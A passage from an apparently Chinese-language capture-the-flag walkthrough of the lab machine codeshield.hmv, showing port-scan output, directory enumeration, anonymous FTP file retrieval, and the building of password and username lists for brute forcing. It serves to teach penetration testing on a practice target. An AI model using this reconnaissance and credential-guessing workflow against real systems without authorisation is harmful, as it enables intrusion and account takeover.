DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n993\/tcp open imaps? syn-ack\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_imap-capabilities: IDLE SASL-IR more have ID post-login listed AUTH=PLAIN ENABLE capabilities IMAP4rev1 Pre-login OK AUTH=LOGINA0001 LITERAL+ LOGIN-REFERRALS\n|_ssl-date: TLS randomness does not represent time\n995\/tcp open pop3s? syn-ack\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_pop3-capabilities: TOP UIDL SASL(PLAIN LOGIN) USER RESP-CODES CAPA AUTH-RESP-CODE PIPELINING\n2222\/tcp open ssh syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G\/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh\/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb\n| 256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=\n| 256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+\n3389\/tcp open ms-wbt-server syn-ack xrdp\n22222\/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 2a:49:28:84:25:99:62:e8:29:68:88:d6:36:be:8e:d6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMgmhyYVdTpcZBiKVuLSA2gn7UAxrhbSO7ycTn7usJq\/3mcYdGYZacNcCv8qraxBcrdp2zITdCxstX2Fhy\/EG5Q=\n| 256 20:9f:5b:3f:52:eb:a9:60:27:39:3b:e7:d8:17:8d:70 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJdUVPSunKWnNtVeXr0fSi7Nvs2f\/J7wQpoTfOEZVpcT\nService Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo gobuster dir -u https:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 \n[sudo] password for kali: \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: https:\/\/10.0.2.22\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\nError: error on running gobuster: unable to connect to https:\/\/10.0.2.22\/: Get "https:\/\/10.0.2.22\/": tls: failed to verify certificate: x509: cannot validate certificate for 10.0.2.22 because it doesn't contain any IP SANs\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo gobuster dir -u https:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 -k\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: https:\/\/10.0.2.22\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 60375]\n\/contact.html (Status: 200) [Size: 19386]\n\/about.html (Status: 200) [Size: 27169]\n\/blog.html (Status: 200) [Size: 37661]\n\/detail.html (Status: 200) [Size: 36406]\n\/service.html (Status: 200) [Size: 23979]\n\/feature.html (Status: 200) [Size: 18200]\n\/team.html (Status: 200) [Size: 23225]\n\/quote.html (Status: 200) [Size: 18554]\n\/price.html (Status: 200) [Size: 23856]\n\/robots.txt (Status: 200) [Size: 26]\n\/LICENSE.txt (Status: 200) [Size: 1422]\n\/testimonial.html (Status: 200) [Size: 18531]\nProgress: 139602 \/ 882244 (15.82%)<\/code><\/pre>\n\u7b2c\u4e00\u6b21\u62a5\u9519\u662f\u56e0\u4e3a\u670d\u52a1\u5668\u4f7f\u7528\u7684 TLS \u8bc1\u4e66\u672a\u5305\u542b\u76ee\u6807 IP \u5730\u5740\uff08\u5982 10.0.2.22<\/code>\uff09\u4f5c\u4e3a SAN\uff0c\u5bfc\u81f4\u5ba2\u6237\u7aef\u65e0\u6cd5\u9a8c\u8bc1\u8bc1\u4e66\u6709\u6548\u6027\uff0c\u5728 Gobuster \u547d\u4ee4\u4e2d\u6dfb\u52a0 -k<\/code> \u6216 --no-tls-validation<\/code> \u53c2\u6570\uff0c\u8df3\u8fc7 TLS \u8bc1\u4e66\u9a8c\u8bc1\u3002<\/p>\n\u4f46\u662f\u592a\u6162\u4e86\uff0c\u4e14\u6ca1\u53d1\u73b0\u5565\u4e1c\u897f\uff0c\u5c31\u6362\u4e86\u4e00\u4e2a\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ curl -k https:\/\/$IP\/robots.txt\nUser-agent: *\nDisallow: \/<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo dirsearch -u https:\/\/$IP \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/codeshield\/reports\/https_10.0.2.22\/_25-05-29_23-55-44.txt\n\nTarget: https:\/\/10.0.2.22\/\n\n[23:55:44] Starting: \n[23:55:45] 301 - 162B - \/js -> https:\/\/10.0.2.22\/js\/\n[23:55:45] 403 - 548B - \/%2e%2e;\/test\n[23:55:57] 301 - 162B - \/.well-known\/caldav -> https:\/\/10.0.2.22\/SOGo\/dav\n[23:55:57] 301 - 162B - \/.well-known\/carddav -> https:\/\/10.0.2.22\/SOGo\/dav\n[23:56:03] 200 - 27KB - \/about.html\n[23:56:09] 403 - 548B - \/admin\/.config\n[23:56:24] 403 - 548B - \/admpar\/.ftppass\n[23:56:24] 403 - 548B - \/admrev\/.ftppass\n[23:56:32] 403 - 548B - \/bitrix\/.settings\n[23:56:32] 403 - 548B - \/bitrix\/.settings.php\n[23:56:32] 403 - 548B - \/bitrix\/.settings.php.bak\n[23:56:32] 403 - 548B - \/bitrix\/.settings.bak\n[23:56:40] 200 - 19KB - \/contact.html\n[23:56:42] 301 - 162B - \/css -> https:\/\/10.0.2.22\/css\/\n[23:56:51] 403 - 548B - \/ext\/.deps\n[23:56:51] 200 - 34KB - \/favicon.ico\n[23:56:59] 301 - 162B - \/img -> https:\/\/10.0.2.22\/img\/\n[23:57:03] 200 - 5KB - \/iredadmin\n[23:57:03] 403 - 548B - \/js\/\n[23:57:05] 403 - 548B - \/lib\/\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.settings\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.flexProperties\n[23:57:05] 301 - 162B - \/lib -> https:\/\/10.0.2.22\/lib\/\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.actionScriptProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.project\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.flexLibProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.actionScriptProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.settings\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.project\n[23:57:06] 200 - 1KB - \/LICENSE.txt\n[23:57:09] 200 - 5KB - \/mail\/\n[23:57:09] 301 - 162B - \/mail -> https:\/\/10.0.2.22\/mail\/\n[23:57:09] 403 - 548B - \/mailer\/.env\n[23:57:13] 502 - 552B - \/Microsoft-Server-ActiveSync\/\n[23:57:16] 401 - 574B - \/netdata\/\n[23:57:17] 303 - 0B - \/newsletter\/ -> https:\/\/10.0.2.22\/iredadmin\/newsletter\n[23:57:32] 403 - 548B - \/resources\/sass\/.sass-cache\/\n[23:57:32] 403 - 548B - \/resources\/.arch-internal-preview.css\n[23:57:32] 200 - 26B - \/robots.txt\n[23:57:42] 403 - 548B - \/status?full=true\n[23:57:42] 403 - 548B - \/status\n[23:57:49] 403 - 548B - \/twitter\/.env\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\nftp\u670d\u52a1\u63a2\u6d4b<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ftp $IP \nConnected to 10.0.2.22.\n220 (vsFTPd 3.0.5)\nName (10.0.2.22:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls\n229 Entering Extended Passive Mode (|||51498|)\n150 Here comes the directory listing.\n-rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n-rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n226 Directory send OK.\nftp> mget *\nmget CodeShield_pitch_deck.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||57895|)\n150 Opening BINARY mode data connection for CodeShield_pitch_deck.pdf (2349914 bytes).\n100% |************************************************************************************************************************************************| 2294 KiB 4.37 MiB\/s 00:00 ETA\n226 Transfer complete.\n2349914 bytes received in 00:00 (4.35 MiB\/s)\nmget Information_Security_Policy.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||56628|)\n150 Opening BINARY mode data connection for Information_Security_Policy.pdf (67520 bytes).\n100% |************************************************************************************************************************************************| 67520 672.40 KiB\/s 00:00 ETA\n226 Transfer complete.\n67520 bytes received in 00:00 (658.94 KiB\/s)\nmget The_2023_weak_password_report.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||64848|)\n150 Opening BINARY mode data connection for The_2023_weak_password_report.pdf (226435 bytes).\n100% |************************************************************************************************************************************************| 221 KiB 2.46 MiB\/s 00:00 ETA\n226 Transfer complete.\n226435 bytes received in 00:00 (2.40 MiB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls\n229 Entering Extended Passive Mode (|||24645|)\n150 Here comes the directory listing.\n-rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n-rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n226 Directory send OK.\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u524d\u9762\u4fe1\u606f\u641c\u96c6\u5230\u7684\u51e0\u4e2apdf\u6587\u4ef6\u5168\u90fd\u4e0b\u8f7d\u4e0b\u6765\u4e86\uff0c\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\n- \n
CodeShield_pitch_deck.pdf<\/code>\u662f\u4e00\u4e2appt<\/p>\n<\/li>\n- \n
Information_Security_Policy.pdf<\/code>\u662f\u4fe1\u606f\u5b89\u5168\u653f\u7b56<\/p>\n<\/li>\n- \n
2023 The_2023_weak_password_report.pdf<\/code>\u662f\u4e00\u4efd\u5f31\u5bc6\u7801\u62a5\u544a<\/p>\n<\/li>\n<\/ul>\n\u53d1\u73b0\u4e86\u4e00\u4e9b\u6709\u53ef\u80fd\u5229\u7528\u5230\u7684\u4fe1\u606f\uff1a<\/p>\n
![\"image-20250530100300186\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u53d1\u73b0\u4e86Jessica Carlson<\/code>\u4ee5\u53ca\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<\/div><\/p>\n\u5b58\u5728\u57df\u540d\u89e3\u6790\uff0c\u53ef\u4ee5\u52a0\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo vim \/etc\/hosts\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat \/etc\/hosts | grep hmv \n10.0.2.22 codeshield.hmv<\/code><\/pre>\n<\/div><\/p>\n\u6dfb\u52a0\u4e00\u4e0b\u5230\u5bc6\u7801\u4e2d\uff0c\u8bf4\u4e0d\u5b9a\u540e\u9762\u9700\u8981\u7206\u7834\u5565\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat pass \nXxxxxxxxx001\nPassword123!\nGreatplace2work!\nDiciembre@2017\nHairdresser1!\n1qa2ws3ed4rf\nXXXX12345678\nHairdresser1\nXxxxxxxxx002\nXxxxxxxxxx01<\/code><\/pre>\nweb\u63a2\u6d4b<\/h3>\n
\u53d1\u73b0\u9776\u673a\u5f00\u542f\u4e8680<\/code>\u548c443<\/code>\u7aef\u53e3\uff0c\u663e\u7136\u662f\u6709web\u670d\u52a1\u7684\uff0c\u6253\u5f00\u53d1\u73b0\u51e0\u5904\u540d\u5355\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u628a\u540d\u5355\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n
Jessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson<\/code><\/pre>\n\u4ee5\u53ca\u8bc4\u8bba\u91cc\u63d0\u5230\u4e86\u4e00\u4e2a\u4ebaKevin Vaidez<\/code>\u3002<\/p>\n\u4f46\u662f\u6839\u636e\u7ecf\u9a8c\uff0c\u4e00\u822c\u90fd\u662f\u59d3\u6216\u540d\u4f5c\u4e3a\u8d26\u53f7\uff0c\u8bd5\u4e00\u4e0b\uff1b<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ awk '{for(i=1;i<=NF;i++) print $i}' user >> user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user | grep -v '^$'\nJessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nJessica\nCarlson\nMohammed\nMansour\nXian\nTan\nAnnabella\nCocci\nThomas\nMitchell\nPatrick\nEarly\nBob\nWatson\nJennifer\nCruise\nJohn\nDoe\nAngelina\nJohnson\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user | tr 'A-Z' 'a-z' >> user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user \nJessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nKevin Vaidez\nJessica\nCarlson\nMohammed\nMansour\nXian\nTan\nAnnabella\nCocci\nThomas\nMitchell\nPatrick\nEarly\nBob\nWatson\nJennifer\nCruise\nJohn\nDoe\nAngelina\nJohnson\nKevin\nVaidez\njessica carlson\nmohammed mansour\nxian tan\nannabella cocci\nthomas mitchell\npatrick early\nbob watson\njennifer cruise\njohn doe\nangelina johnson\nkevin 